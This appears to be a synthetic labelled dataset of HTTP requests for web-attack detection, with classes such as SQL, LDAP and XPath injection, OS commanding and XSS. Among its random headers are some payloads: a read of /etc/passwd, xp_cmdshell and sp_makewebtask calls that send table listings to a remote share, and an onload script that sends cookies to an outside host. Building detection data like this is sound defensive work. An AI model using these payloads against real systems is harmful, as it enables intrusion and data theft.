Trailer: Trailer
User-Agent: Mozilla/9.8 (Windows; U; Windows NT 1.6; cd-I6; rv:4.2.4) Gecko/80114798
UA-CPU: Sparc
UA-Disp: 6597,6108,32
UA-OS: WinNT
UA-Color: color16
UA-Pixels: 6780x4829
Via: 4.8 88.241.245.135:24, 8.1 108.187.220.135:5
Transfer-Encoding: htsdst; rh9isi=bha5El
Upgrade: rlwdd/8.0, wre/1.9, b3o/6.7
Warning: 267 www.otmR1ir.htm "emnzR" "Mon, 09 Jun 08 08:56:30 UTC"
X-Forwarded-For: 139.160.46.245
X-Serial-Number: 25128044
----: ------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38396
Start - Id: 37612
class: LdapInjection
PUT /wtmla8astnrs906e.tiff? HTTP/1.1
Content-Length: 49
Content-Language: zlog,Eus4U,irowetv
Content-Encoding: gzip
Content-Location: http://www.9mao0.ch/zs9g/jinrod.jpg
Content-MD5: emZhd2dtNWFpZGVvSmx1YQ==
Content-Type: application/x-www-form-urlencoded
Expires: Wed, 12 Jul 06 15:33:51 CET
Last-Modified: Wed, 17 Jun 09 23:05:25 GMT
Host: www.e1dyOaust.it
Connection: pluab
Accept: video/mpeg;q=0.0, application/*, video/mpeg
Accept-Charset: x-mac-hebrew;q=0.2, x-mac-cyrillic, x-mac-roman, iso-8859-8, koi8-r;q=0.5
Accept-Encoding: gzip;q=0.6, deflate;q=0.8, deflate;q=0.7, identity;q=0.8
Accept-Language: 2gbrn-eeaacimr, l45koo6-A9ho, Hfw3-mueaee;q=0.9
Cache-Control: only-if-cached
Client-ip: 34.23.57.157
Cookie: ze9BlocationZ=732496;9etha9stahwo9=eandhpg;.ByWM_eEdelete=Sde;iamJsi8ePtC7N=libde]ei ohssg/p\e
Cookie2: $Version="98"
Date: Sun, 28 Nov 04 13:01:04 CET
ETag: "6t0u8o_yH@NZvJitW"
Expect: 100-continue
From: tiwatv@kDh9.de
If-Modified-Since: Wed, 18 Aug 04 15:21:39 GMT
If-Unmodified-Since: Fri, 30 Mar 07 15:18:20 UTC
If-Match: *
If-None-Match: *
If-Range: "W9v6zh.qhKg.Ghh_"
Max-Forwards: 94
MIME-Version: 9.1
Pragma: no-cache
Proxy-Authorization: wCwbd1 E1saai=4olnf
Authorization: 9zero hxpb=aiseetc
Range: 9-3321,97916-131
Referer: http://www.mvqa.net/eb8chtf.tar
TE: trailers
Trailer: Accept-Language
User-Agent: mrhrlh9c
UA-CPU: PowerPC
UA-Disp: 2548,1743,32
UA-OS: Win9x
UA-Color: color16
UA-Pixels: 770x317
Via: 0.9 68.127.98.228, pSlge/6.8 www.makIEa.css, 3.9 www.nsaieape.png:1603
Transfer-Encoding: dale
Upgrade: roOt/4.0, lDulw/0.4, tsto/6.6, teepwe/5.4, uyq/3.7
Warning: 019 53.184.51.92 "gqnaoerdito" 
X-Forwarded-For: 20.191.23.124
X-Serial-Number: 220877773
----: ----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

eotnub=esqoa)(&(objectClass=   upNh*)

End - Id: 37612
Start - Id: 36778
class: OsCommanding
GET /rfhhclhCuet/uWxm1yQ5Bm/qFDi/wXqcoY_0I/aae/gfinahIltzZeteiuEn0/tve/PtdW5nthCvDrraCahipa/t9V1f.shtml?qnrzb1tumesh2=080&un=71&6zotdmagmsteit=+sr5x7qeosam%40Atu%5B&oaos7uf=elAuH%40&bj=880&aa5z=%250a++++cat%250a++++%2Fetc%2Fpasswd+++%250a&ra3ciao6=aAMTHH-&ihtolzrpex8=%3AtYtis%29t&hpgeao=w.iGv&wtl=wrr&passthrunodeIrinsertgnmochaTDA=68496&qslrh=8461&hef2oh=9&utIiieDsIk=9np&S0ZvUfUi7=5621487 HTTP/1.1
Host: www.orkoplrrp.uk
Connection: keep-alive
Accept: video/quicktime;q=0.6
Accept-Charset: *
Accept-Encoding: gzip, deflate
Accept-Language: rboggveN-a
Cache-Control: no-cache
Client-ip: 88.245.36.40
Cookie: ehRewttg=9687;shAaesssS=iI37-PN9;ttvNohEf1=q;x2B2hhe=464706319;eoid4soih=catisam h/ci~a[e
Cookie2: $Version="6"
Date: Sat, 10 Jan 04 20:46:51 UTC
ETag: W/"a2MfL4Y2OfEeov-6"
Expect: tYl5irs
From: hqdnlp@uehby4G.ch
If-Modified-Since: Fri, 03 Oct 08 05:24:18 GMT
If-Unmodified-Since: Sun, 25 Jul 04 06:36:29 GMT
If-Match: *
If-None-Match: "tjlqSMTcuNUJnPiC"
If-Range: Wed, 22 Nov 06 11:14:50 UTC
Max-Forwards: 5
MIME-Version: 5.1
Pragma: no-cache
Proxy-Authorization: Basic aWhvNWg6ZWZ0RGR5cg==
Authorization: wyboL acphzxa=ieoTe
Range: 907-5,-807
Referer: http://www.tmblroz.gov/t9aerr.jpeg
TE: gzip,trailers,trailers
Trailer: User-Agent
User-Agent: i13lnoe9en/4.9.9.9.3
UA-CPU: MIPS
UA-Disp: 030,272,32
UA-OS: Win95
UA-Color: color8
UA-Pixels: 232x1783
Via: FTP/9.8 212.141.128.165, 0.0 www.rtqny.html
Transfer-Encoding: compress
Upgrade: mew/8.4, w3bv/8.4, ttttf/6.4, ua5/6.2
Warning: 780 www.pSzaM.htm:09 "rooshxoYosit" "Sat, 18 Nov 06 04:55:06 CET"
X-Forwarded-For: 5.176.183.129
X-Serial-Number: 51873709956197
----: ---------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 36778
Start - Id: 41051
class: SqlInjection
GET /h4TwZh7dJ3a7U8KgS.jsp?Ml0Eocwkstbm=u+gedecopyH%7E+nph-tmptz+zsdoa&7e7=d79A6-noVIO&PbusrM5=459223&V8KYu4Mh=exec++++xp_cmdshell+++%27%22eawdcsr%22++++%3E%3E+++++script.vbs%27&Ror=i.3&hsi4=042931&pm1per87etreee=2%27o9d0dntes%2Fn8brj+&eLdRdgg=705983&eH2se0rT=i2and&Lhc6phIllhehie8=njqAu HTTP/1.0
Host: 115.246.247.76:80
Connection: tnch
Accept: */*
Accept-Charset: koi8, x-mac-icelandic, x-mac-chinesesimp, x-mac-roman, x-mac-chinesetrad;q=0.4
Accept-Encoding: *;q=0.7
Accept-Language: *;q=0.0
Cache-Control: min-fresh=527
Client-ip: 228.4.149.91
Cookie: Aconnectd9a=2oon;ldsirLsoz=andai
Cookie2: $Version="386"
Date: Tue, 29 Aug 06 22:25:39 UTC
ETag: W/"8ZFZf9yc-djNYPGhy8y"
Expect: 100-continue
From: 4a4Ax80@ieieio.ch
If-Modified-Since: Sun, 07 Feb 10 17:03:43 UTC
If-Unmodified-Since: Tue, 07 Nov 06 15:30:30 UTC
If-Match: "4NWRnqIauxuK56ERj"
If-None-Match: *
If-Range: Fri, 01 Jan 10 24:42:53 GMT
Max-Forwards: 844
MIME-Version: 1.5
Pragma: 8e='5'
Proxy-Authorization: Digest cnonce="jpdruSsi"
Authorization: Digest cnonce="wodtdE"
Range: 7-04,570-
Referer: /mdemeEtS/iotn.cgi
TE: trailers
User-Agent: FTiefs6awa/8.3.5.5.6
UA-CPU: PowerPC
UA-Disp: 2063,773,32
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 967x915
Via: 9.1 www.edFayer.gif, 4.2 171.159.146.43:254
Transfer-Encoding: compress
Upgrade: noqd/4.9, eti/6.4, 0arte/8.9
Warning: 428 www.ndOerieL.jpeg:9 "btsgnnnhoeooes5ArHa7" 
X-Forwarded-For: 57.95.233.202
X-Serial-Number: 54708069609443708
----: -----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 41051
Start - Id: 42776
class: SqlInjection
POST /j7IUN9BbUAiBl8/eta0nr/nQZnj5_O19SWuQAk6yrV/oitrinKsums0nw/bhwk2gaU4Io_3r/eOeholnsagr/hNvdnB/tMpa.tiff? HTTP/1.1
Content-Length: 96
Content-Language: ntie
Content-Encoding: identity
Content-Location: /amsEpnol/npysnI.swf
Content-MD5: bnJxSW5lNnNocXIwc29uZw==
Content-Type: application/x-www-form-urlencoded
Expires: Sun, 13 Sep 09 12:59:47 CET
Last-Modified: Wed, 01 Jul 09 08:00:28 CET
Host: 161.117.227.26
Connection: keep-alive
Accept: */*;q=0.1
Accept-Charset: euc-kr;q=0.5, windows-1250;q=0.2, windows-874;q=0.5
Accept-Encoding: deflate;q=0.0, identity;q=0.7, deflate, compress
Accept-Language: nl-ss;q=0.2, a4-Dcgjc;q=0.0, 9-gAnx, i3-ce
Cache-Control: only-if-cached
Client-ip: 153.202.199.72
Cookie: wfyiiId5=OR  25953>462487385;etn=Ywr7uIifmbhb;@raNBxIV1nodeEU=yookS;0meeiesen=bhDOaiscript/rWreplaceAjl
Cookie2: $Version="74"
Date: Tue, 05 Oct 04 13:13:32 UTC
ETag: "WF4A4@FXbzWEO3h-"
Expect: le7n
If-Modified-Since: Thu, 17 Dec 09 04:44:42 CET
If-Unmodified-Since: Fri, 14 Sep 07 12:11:28 GMT
If-Match: *
If-None-Match: *
If-Range: "6a0hn3u8YbmBMArkT"
Max-Forwards: 308
MIME-Version: 5.1
Pragma: ea='ekeVbco'
Proxy-Authorization: 1oi2hy rTepl=hneaC
Authorization: Basic aHBjcjRhYTpvdWVv
Range: 169067-0
Referer: http://www.t0t5.st/i3iem3b/rSden/wt1rek.jpeg
TE: gzip;q=0.7
Trailer: Authorization
User-Agent: Mozilla/8.5 (compatible; MSIE 7.5; Unix; esSa9ran9; oz1s; eiei22)
UA-CPU: PowerPC
UA-OS: Linux
UA-Pixels: 449x877
Via: FTP/5.9 249.135.113.171, FTP/1.8 49.36.11.166
Transfer-Encoding: lnai3; e5sbeSHt=ptee8erh
Upgrade: ttrim/1.8, gsctt/6.0, taln/5.0
Warning: 901 www.ooto5.jpg "hxEMfthhileDx" 
X-Serial-Number: 58260161
----: ----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

9o=eo&sehrl5ine2bS=7516846546&rrnttloNd1d8=n5&eewrmriBn=elcIe&n1eai=srhe:shnscriptuSrmtconnect

End - Id: 42776
Start - Id: 48882
class: XPathInjection
GET /oKqJtah2mvW0zb/wDoKidHAcYc/6ewsp-dvmvg9-tLh8M/n64@bGVj.html?euh4OIEnharJ=7597&qeiraoorhac=%3AfRm&hTrwntitniaE1A=i%2F%5Bw&piLedhoTee=74&reaostdrp=r%2Fdqecae+nTwssScmd&slfwo=005148381&cdivkEconnectr6%u=sZtarl%27%5D+%7C+++P++++%7C++%2F%2Fuser%5B++++name%2Ftext%28++++%29+%3D++++%27ra&tpexsidontitT=eyfru%25kuk+%2Fotd9Tnyl&eul=llz1 HTTP/1.0
Host: 244.85.104.140
Connection: close
Accept: video/*;q=0.7, audio/*
Accept-Charset: utf-7, iso-8859-3, x-mac-korean, cp-950, koi8-r
Accept-Encoding: compress, identity;q=0.1, deflate
Accept-Language: *
Cache-Control: no-transform
Client-ip: 220.116.206.243
Cookie: Luoe=012706159;eisRlenro7Ao=e4oes?gis ;nedraOriol=98;au=aua1i;v.0pVNLvhB2=1ahtpaxduTsr
Cookie2: $Version="409"
Date: Fri, 25 Apr 08 20:22:46 CET
ETag: "62GK_7jLYsp@BqfFlhae"
Expect: 5iusOoAi
From: nhrer@c9ndnn.gov
If-Modified-Since: Mon, 18 Aug 08 16:01:49 GMT
If-Unmodified-Since: Fri, 19 Dec 08 10:44:08 CET
If-Match: *
If-None-Match: "xZBam07P2VwFIbTCYU"
If-Range: Sun, 27 Sep 09 23:27:54 CET
Max-Forwards: 792
MIME-Version: 4.6
Pragma: no-cache
Proxy-Authorization: dyscrl o8iQnhe=rsca
Authorization: Digest realm
Range: 41-,-69
Referer: /zwoiesnn/fyk3/u0od/pozmors.txt
TE: gzip,trailers,deflate
Trailer: Max-Forwards
User-Agent: hZ@iIl http://www.h2eto.st
UA-CPU: MIPS
UA-Disp: 184,1119,16
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 1420x8323
Via: HTTP/5.6 28.237.93.34
Transfer-Encoding: gzip
Upgrade: w3tl/4.7, o4Ow/6.6
Warning: 737 218.64.14.144 "btkeCbiitsnonn" "Tue, 09 Aug 05 16:53:24 CET"
X-Forwarded-For: 89.218.173.144
X-Serial-Number: 3294435
----: ------------------
~~~~~: ~~~~~~~~~~~~~~

null

End - Id: 48882
Start - Id: 37591
class: LdapInjection
POST /ea9/hNF6d3JYCCe1-n@eNUC/hsGuWSdZV45T/5eInodeHTIdjwwqwL.jpeg? HTTP/1.1
Content-Length: 194
Content-Language: g
Content-Encoding: deflate
Content-Location: /6sdnr3o/oeesieua.pl
Content-MD5: c29xY3NyY1VzQmlvRXlsaQ==
Content-Type: application/x-www-form-urlencoded
Expires: Sat, 16 May 09 10:12:43 CET
Last-Modified: Thu, 19 Apr 07 11:35:51 CET
Host: www.lEyhuLm.de:80
Connection: close
Accept: */*;q=0.2
Accept-Charset: x-mac-ce, x-mac-cyrillic;q=0.9, windows-874, iso-8859-15
Accept-Encoding: compress;q=0.8
Accept-Language: e-i, scnts-dxjb;q=0.3, esy9hdia-eatSgii
Cache-Control: max-age=459
Client-ip: 229.175.84.16
Cookie: V@K@4RE.H=8ZF
Cookie2: $Version="870"
Date: Fri, 26 Nov 04 05:45:15 GMT
ETag: "@QX@_ywUL101QKMd"
Expect: 100-continue
From: Stnfsrr@eacmtr.gov
If-Modified-Since: Sat, 09 Jul 05 08:39:11 GMT
If-Unmodified-Since: Sat, 29 Oct 05 24:35:27 GMT
If-Match: "cNDMqEjUm2--epdjG64C"
If-None-Match: *
If-Range: *
Max-Forwards: 3734
MIME-Version: 4.3
Pragma: traeah='0'
Proxy-Authorization: Digest qop=Sogaol
Authorization: NTLM aXRvYXBhbnVvbFdadnBhb29zaWVscnN0dGh1dHI1bW5hYW50bGVDZXd1YWU=
Range: 3-46,1783-444359
Referer: http://www.beeh.biz/NcCemi.asmx
TE: deflate;q=0.6,chunked
Trailer: Accept-Language
User-Agent: srnetnu2y/2.9
UA-CPU: PowerPC
UA-Disp: 0007,792,32
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 4454x553
Via: 1.3 251.12.24.108
Transfer-Encoding: gzip
Upgrade: vYs/1.2
Warning: 943 www.FaAepr.shtml "i9ws4h7nus" 
X-Forwarded-For: 111.32.250.246
X-Serial-Number: 35061677814454
----: ----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

jdeesz=601359&a3S=556285229&6hiFiou=61433&tjtejrnhgbs17a=nce&gvNdroudos= ziTnye&aiBrace=63&mngnh=vCEDji-1&un=)(    |    (ahg=ot*)&eoet=epsosA&acceptPFIlmetaxnc=28285865&ooeQt7rfta=76

End - Id: 37591
Start - Id: 41055
class: SqlInjection
GET /fmbdokrntynTImIm/hn-.UP/.tmp_HF3metavbRftpkT/p5so/0T1bNEmpM0A/th.W3@I.eSxDhswJ.4C2/aqs70ocxtolcitanidt4/pLfs.Wy@xk6rH/0uhh/3OVvT.js?ginq=Sh%7Ece&EYmxY0a=13959081&al=%27%3B++++EXEC++++master..sp_makewebtask+%22%5C%5C216.68.58.115%5Ciltc%5CLpanxys.css%22%2C++++%22SELECT+*+++++FROM+INFORMATION_SCHEMA.TABLES%22 HTTP/1.1
Host: www.oSuno5jc.net
Connection: keep-alive
Accept: */*
Accept-Charset: *;q=0.8
Accept-Encoding: deflate;q=0.9, identity;q=0.1, compress;q=0.7, gzip, gzip;q=0.9
Accept-Language: n855lnos-psn, e8y-izxonl;q=0.4, iLlhn-IV, xr0sre-or9ta;q=0.5
Cache-Control: max-age=0252
Client-ip: 228.4.149.91
Cookie: Aconnectd9a=2oon;ldsirLsoz=andai
Cookie2: $Version="3"
Date: Fri, 24 Sep 04 10:40:51 GMT
ETag: W/"8ZFZf9yc-djNYPGhy8y"
Expect: anoat
From: 4a4Ax80@ieieio.ch
If-Modified-Since: Fri, 12 Feb 10 19:13:18 CET
If-Unmodified-Since: Tue, 18 Jan 05 09:04:54 UTC
If-Match: "5mqQPy@ILOQhO5Nzde"
If-None-Match: *
If-Range: Sat, 21 Apr 07 21:30:31 CET
Max-Forwards: 6
MIME-Version: 1.5
Pragma: a3OHhi5e='vslor'
Proxy-Authorization: NTLM c3RhdnNuaU9hMWF0VHRnczFzMTF0N29wZWl4d2NlTG5ubg==
Authorization: Basic eXVldFQ6YW1oZ2lhbA==
Range: 7-04,570-
Referer: http://qLn1Mm.it/mdk9s/itteR/aEodoto.bin
TE: gzip
User-Agent: 6nre8ea/2.4.9.7.6
UA-CPU: PowerPC
UA-Disp: 2063,773,32
UA-OS: Win95
UA-Color: color8
UA-Pixels: 967x915
Via: 8.9 www.enenr.jpeg:86
Transfer-Encoding: identity
Upgrade: 8y7ca/4.0, ennao/2.4, eme/1.0
Warning: 428 www.ndOerieL.jpeg:9 "btsgnnnhoeooes5ArHa7" 
X-Forwarded-For: 57.95.233.202
X-Serial-Number: 54708069609443708
----: -------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 41055
Start - Id: 41171
class: SqlInjection
PUT /iu3/rs4ekemuoud/TCamooeaEoo/yboomannlt2aqbnpsin/ac2DAge3lOUhFPPTikc/fm9uDm@PZFn82h_/fPl/tqlOiFBlGSEBTJAh7gF.cgi? HTTP/1.0
Content-Length: 227
Content-Language: N
Content-Encoding: identity
Content-Location: http://nouE3oi.ch/betg.wmn
Content-MD5: ckd0ZGQ2bEVhMWlld3RuZQ==
Content-Type: application/x-www-form-urlencoded
Expires: Thu, 10 Jun 04 22:15:56 GMT
Last-Modified: Sun, 07 Nov 04 07:31:14 UTC
Host: www.deshcn.gov
Connection: keep-alive
Accept: */*
Accept-Charset: *
Accept-Encoding: *
Accept-Language: *;q=0.1
Cache-Control: no-transform
Client-ip: 63.133.125.251
Cookie: GRarte=';   EXEC    master..sp_makewebtask  "\\185.36.245.158\tuWel\ncgt.jpg",  "SELECT     *     FROM     INFORMATION_SCHEMA.TABLES"
Cookie2: $Version="399"
Date: Fri, 08 May 09 11:18:54 GMT
ETag: "V_7UxOgAFyWnXWB@nzue"
Expect: 100-continue
If-Modified-Since: Sat, 07 Jul 07 22:01:00 UTC
If-Unmodified-Since: Mon, 09 Feb 09 06:32:53 GMT
If-Range: Sat, 02 Apr 05 08:13:37 GMT
Max-Forwards: 7
Pragma: no-cache
Proxy-Authorization: nhtos lpYb=io9One
Referer: http://www.eia1.st/tne3eiH.dll
TE: deflate;q=0.3,trailers
User-Agent: Mozilla/1.0 (Windows; U; Win 9x 4.7; ha-It; rv:5.9.7) Gecko/91377778
Via: HTTP/9.9 www.yteep.js:51
----: ------------------------------------
~~~~~: ~~~~~~~~~~~~

e48tgiTen=824&per=ahttpa0siriDe&MnetcatAMSWWnph-zI=630&tRbsOf3=82565&serptchoZw=c8r86m-S_g&OfdeleteaLG1=ld(s1ea6dn b$&gagieTebs=execnrallupdatei&01=2607&mOmdho4seieYe=axttrAe&SenN_NWwechoUE=094837&optscriptutqwinntb=ysohlss

End - Id: 41171
Start - Id: 50092
class: XPathInjection
PUT /slnNitujtAct/oL3TT/hkZiof3w/lu.BpVlckhF2S/nwBfsFK9ONL30r/OhlWzais9de7na5l/Ucgqsvhokd/nysj4en0/1thXGRuBQ8EJlW-xs/nBYVl.YKI.QRiJ2EBL.gif? HTTP/1.0
Content-Length: 76
Content-Language: mLwreap,xwil
Content-Encoding: deflate
Content-Location: http://olf0oo.gov/tep8apHA/etea/dTaLso0o/nssmltOt.html
Content-MD5: bGF0Y25pZXNlZG56aWFvbw==
Content-Type: application/x-www-form-urlencoded
Expires: Sun, 09 Jan 05 14:34:45 CET
Last-Modified: Thu, 26 Jun 08 21:31:56 UTC
Host: 198.118.121.141
Connection: smtsp
Accept: application/rtf
Accept-Charset: *;q=0.6
Accept-Encoding: 
Accept-Language: *
Cache-Control: max-stale=66
Client-ip: 104.169.17.150
Cookie: ewar0rimlgtrtt=9924  or  trtrR5/ohmn/hiq/child::node()[position()=0]    or 0=
Cookie2: $Version="182"
Date: Fri, 04 Mar 05 08:51:44 UTC
ETag: W/"gSd1WERUhC0BX9-@"
Expect: 100-continue
If-Modified-Since: Wed, 11 May 05 22:12:54 UTC
If-Unmodified-Since: Thu, 15 Dec 05 01:29:51 UTC
If-Match: "xCx8qEJ.-PTU_h3"
If-None-Match: *
If-Range: Sun, 25 Jun 06 20:26:21 CET
Max-Forwards: 760
MIME-Version: 4.1
Pragma: lcebdo=es
Proxy-Authorization: iina0E u2nmigt=TcO1ctyp
Authorization: Digest uri=/ltse/etana/aCsatlH/vlidueE.bin
Range: 2394-,363-312,016894-
Referer: /aImiur/riho2/hyhps.mpeg
TE: trailers
Trailer: Warning
User-Agent: raqxeaZa/9.8
UA-CPU: 68000
UA-Disp: 534,2890,16
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 4253x311
Via: 4.1 170.184.183.50, 7.2 www.errC.css:2181
Transfer-Encoding: gzip
Upgrade: agy/1.8, on8/7.9, oDucgc/2.3, onnkq/9.5
Warning: 653 103.93.101.105:17 "aetlgatnhrco" 
X-Serial-Number: 42303
----: -----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

uiuNeth8isstr=3Nssb?&rhnnomv=1&Lwu92egRNrolete=idaqwia&dqjn2ordll=79651835

End - Id: 50092
Start - Id: 42072
class: SqlInjection
GET /Rr0gR9cesCaQ0/w2WMYj/owjABR1IH/cb5WO/bodyCZ9Iprocessing-instruction6KViEprocessing-instructionJtreplace/o.tmRNtX8q5mLjfvBo/Ombwm/kd/tSowISUjTI.pl?rul=rla&6foONhtaccesCd5=220022&9gsdoLanss=vc93a&misiwoiosl4Aoo=09&ey6in=OR+%27ps%27+++++%3D+%27Sim%27%2B%27ple%27&fne6Nsetag=12930&RNpasswd5=2087 HTTP/1.0
Host: www.heyd1rn.cz
Connection: saa5tbe
Accept: */*;q=0.2
Accept-Charset: *;q=0.0
Accept-Encoding: identity, identity, gzip;q=0.3, identity;q=0.7
Accept-Language: *;q=0.1
Cache-Control: only-if-cached
Client-ip: 18.205.184.49
Cookie: Enupln4Ie8=3hL;hihorFrinuhno=ieA;tel=9417;ennCSgel=tLsuWc
Cookie2: $Version="76"
Date: Fri, 09 Jan 04 04:11:01 GMT
ETag: "1pNrCI08loZx0@fmb"
Expect: dntttuy
From: mwetzo8a@ourctd.net
If-Modified-Since: Tue, 16 Mar 04 03:30:05 CET
If-Unmodified-Since: Tue, 02 Oct 07 22:49:22 UTC
If-Match: "WZChvulT.sOUImsYO"
If-None-Match: *
If-Range: *
Max-Forwards: 3725
MIME-Version: 0.9
Pragma: IJoyr='uuhy'
Proxy-Authorization: miIioo U7Eesss=eomtuaa
Authorization: Basic YTFmZm46bmhuaWti
Range: 97-55
Referer: http://OpRru3hg.de/szol1r/tnU9hHof/ldesu.sh
TE: trailers,trailers,trailers
Trailer: Range
User-Agent: sihayabw/4.5.3.9
UA-CPU: Sparc
UA-Disp: 7502,392,16
UA-OS: Windows NT
UA-Color: color16
UA-Pixels: 4241x2926
Via: 1.0 161.174.53.24, HTTP/2.2 www.orfEun.js
Transfer-Encoding: compress
Upgrade: zes4g/0.4, bti/7.1
Warning: 537 38.107.5.37 "lwo1hwxdnein" 
X-Forwarded-For: 39.4.112.68
X-Serial-Number: 94769568584
----: ----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 42072
Start - Id: 48271
class: XSS
POST /tnfmNsaShaasowu/aler60u73aoai/omX.@sMEVsEc1htqIZZ/RdnuaRot2oobhpefPz/e0uwenZQF-y-K2tzN/1_g/ewb-XUTDoc@6WAovsQ/4ii24Asrs.css? HTTP/1.1
Content-Length: 257
Content-Language: TmeiI,vhrbnwd,lnrt
Content-Encoding: compress
Content-MD5: aWVNb3RtbWNybmhpYW5lbQ==
Content-Type: application/x-www-form-urlencoded
Expires: Sun, 22 Oct 06 15:04:15 GMT
Host: www.Inemeh.biz
Connection: m0eee
Accept: text/html;q=0.8, video/*
Accept-Charset: *;q=0.5
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-transform
Client-ip: 4.38.79.185
Cookie: gtphhi=ketjeftT;lshroiwLai3s=6aeomesvx;deh1nb4T=fmbg;NtLplsedangr9=|dropossv4@nodeudt5r yo&;saagoce9mteaKh=<body    onload   =    "[document.location.replace   ('http://www.eldeseta.com/cgi-bin/nt.cgi'+document.cookie);]    "   >
Date: Thu, 20 Nov 08 22:36:52 UTC
ETag: W/"mbgq-B3kQSBMQQgn"
Expect: 100-continue
If-Modified-Since: Mon, 12 Oct 09 24:09:51 GMT
If-Match: "Mrz2inqQSgpCQTUIt4"
If-None-Match: *
Max-Forwards: 3
Pragma: Xx2tq='i'
Proxy-Authorization: e8eeh mFinPerr=qMkohi0
Range: -02341,4-527249
Referer: http://sanmut.gov/ndtern/uqrt/nrtsl/mydo/tbar.cfm
TE: trailers,trailers
User-Agent: Mozilla/2.4 (Windows; U; Windows NT 5.7; Oh-ne; rv:8.9.4) Gecko/70416172
Transfer-Encoding: compress
----: -------------------------------------

eeFzdeswneaorse=sexectc&tRtTEolF=fat&htaaqj3dc=otdm &72ief5e=di1rvx7ouu&l3asoev=|9n~b)&pe=96&2VREE=6859&ineacnuay=q>[&sfhInsd=0&idJ-T_Jjz3F=upositionps&er2h92=ta(&NnmochanMtmpX5DJkbetween=4&oihh75Ejithra=b9U5whmCnf9M&gZ6eot4pe=982&itrOirgb=cbttm

End - Id: 48271
Start - Id: 39042
class: LdapInjection
PUT /uy2vPxF/tolkiubJCzrlnT/thh/oticIc/hfyreraClriint/.Vn7.6execP5IIY/l2axy-G_-308a79ubqbr/KTLMinputdA.jpeg? HTTP/1.0
Content-Length: 130
Content-Language: seh,r77r2,tscsyaut
Content-Encoding: identity
Content-Location: /Bls3aSsc/imsdefDr/aoudo3tt/ogtniu.jpeg
Content-MD5: b3Vud2N0ZXRlbE9hYXJyaQ==
Content-Type: application/x-www-form-urlencoded
Expires: Sun, 25 Dec 05 17:18:49 UTC
Last-Modified: Wed, 16 Apr 08 07:24:59 CET
Host: www.zess.uk
Connection: ootanft
Accept: */*;q=0.5
Accept-Charset: *
Accept-Encoding: *
Accept-Language: *
Cache-Control: min-fresh=0
Client-ip: 56.62.147.82
Cookie: estg=3;3oodhlNr=nep;aceeesacsoaeg=ver3ooeol|i;iieg4ssa=wfe7rqrp
Cookie2: $Version="6"
Date: Mon, 27 Apr 09 12:16:59 GMT
ETag: "uT3zZbW3UQjDV7lpt3"
Expect: nntee
From: fnnah@uEaahd3s.fr
If-Modified-Since: Fri, 22 Jan 10 04:42:47 GMT
If-Unmodified-Since: Wed, 20 Jun 07 22:21:49 UTC
If-Match: "Lm@4KT2ZDL7GJwP"
If-None-Match: "upYjAg9@_BHJct0"
If-Range: Thu, 06 Nov 08 16:50:36 CET
Max-Forwards: 7115
Pragma: qstth='sere58ve'
Proxy-Authorization: NTLM am90MGxhdDFlZXNpbWVPUmhsYWxrYmtvMmVlcmxsaHVsaGdlclRkQWlpMg==
Authorization: Basic aXN1ZDpwbEto
Range: -4
Referer: /tlar0Omn.php3
TE: gzip
Trailer: If-Modified-Since
User-Agent: ss)(&(objectClass  =3tl*)
UA-CPU: MIPS
UA-Disp: 720,158,16
UA-Color: color32
UA-Pixels: 183x5946
Via: 8eon/0.2 238.160.208.29, FTP/2.5 43.2.187.169
Transfer-Encoding: gzip
Warning: 735 184.29.35.89 "oomiU03p" 
X-Forwarded-For: 135.35.56.107
X-Serial-Number: 8237003148832
----: -------------------------------------------------
~~~~~: ~~~~~~~~~~~

7OetmAu3hta=dert&lutanepAasor=s3e;ulavc&eene38mere8hJo=iatesibpee6ig&i53=pHwget@tte[oxcyab&agtmeyob=d R&ri5aopt3aEra1l=txirb

End - Id: 39042
Start - Id: 42811
class: OsCommanding
GET /Dvpzyyetca2catS9/nus1l/e6mDOQ61s-nXp/remftd/ryvhometyKcplinkZ_iaL/tteBIkf/esa/coIcbujA5NftpX/ED20a@PQDjTxEWU.php4?adnroDno00o=5e HTTP/1.0
Host: www.4ap0hYIY.uk
Connection: keep-alive
Accept-Charset: *;q=0.9
Accept-Encoding: identity;q=0.6
Accept-Language: nocas6-ta9nSj;q=0.2, b40kit-rrees6
Client-ip: 8.5.54.4
Cookie: soisIex=14.81.215.196|  dir
Date: Thu, 11 Mar 10 15:32:35 UTC
ETag: W/"Ndahy2324PoaemohBfWy"
If-Modified-Since: Fri, 06 Oct 06 01:01:05 GMT
If-Unmodified-Since: Thu, 12 Jul 07 16:13:17 UTC
If-None-Match: "Wy48bsCi9jQnQEkP"
Pragma: no-cache
Proxy-Authorization: Basic OGFtc21wOmJobm5p
Range: -4555,27-71278
Referer: /g3peraHW.asp
TE: gzip;q=0.6,trailers,trailers
User-Agent: Mozilla/6.0 (compatible; MSIE 4.2; Unix; ttAudmt; eRIdsma5; ryoh)
UA-Disp: 886,6984,32
Via: 7.9 www.TjeIwiio.js, e0P/9.0 www.en9sooi.gif:11404, 3.9 246.192.203.80

null

End - Id: 42811
Start - Id: 45344
class: PathTransversal
GET /tmiH8nasaor/JWxadmin-yTG/i8s2voKNl/TratdSmct/DB/An2-.XkGinserts.php4? HTTP/1.0
Host: www.mcIiesb.cz
Connection: close
Accept: */*;q=0.9
Accept-Charset: *;q=0.7
Accept-Encoding: *;q=0.2
Accept-Language: *
Cache-Control: max-stale=902
